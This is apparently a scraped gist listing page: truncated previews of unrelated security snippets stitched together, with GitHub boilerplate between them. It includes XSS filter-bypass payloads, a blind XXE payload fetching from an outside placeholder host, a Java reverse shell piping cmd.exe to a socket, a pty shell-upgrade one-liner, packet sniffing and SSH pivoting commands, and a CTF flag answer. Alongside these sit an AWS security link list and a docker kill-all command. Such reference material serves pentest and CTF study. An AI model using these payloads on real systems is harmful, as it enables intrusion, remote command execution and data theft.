- Eindbazen "cone" writeup
- Rolf Rolle's z3 based solution to some math problem
- SMT Solvers for Software Security
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
docker ps | awk {' print $1 '} | tail -n+2 > tmp.txt; for line in $(cat tmp.txt); do docker kill $line; done; rm tmp.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
INTRO | |
I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute. | |
Short Link: http://tiny.cc/awssecurity | |
Official AWS Security Resources | |
* Security Blog - http://blogs.aws.amazon.com/security/ | |
* Security Advisories - http://aws.amazon.com/security/security-bulletins/ | |
* Security Whitepaper (AWS Security Processes/Practices) - http://media.amazonwebservices.com/pdf/AWS_Security_Whitepaper.pdf | |
* Security Best Practices Whitepaper - http://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
http://ctf.infosecinstitute.com/ | |
## Level 1: | |
View the source, at the top we see: | |
<!-- infosec_flagis_welcome --> | |
Level 1 PASS: infosec_flagis_welcome |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
String host="localhost"; | |
int port=8044; | |
String cmd="cmd.exe"; | |
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from concurrent.futures import ThreadPoolExecutor | |
from requests_futures.sessions import FuturesSession | |
def outp(response): | |
print(response) | |
print(response.headers) | |
print(response.text) | |
urls = [ | |
"https://www.google.com", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#get a pty through python | |
python -c 'import pty; pty.spawn("/bin/bash");' | |
#grab the user agent from the http header on port 10443 | |
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443 | |
#base64 decode a string | |
echo STRINGTODECODE | base64 --decode | |
#escape jail shell |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
##SOCKS Proxy## | |
#Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1): | |
#Command line: | |
ssh -D 127.0.0.1:1080 10.0.0.1 | |
#~/.ssh/config: | |
Host 10.0.0.1 | |
DynamicForward 127.0.0.1:1080 | |
#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1: |
OlderNewer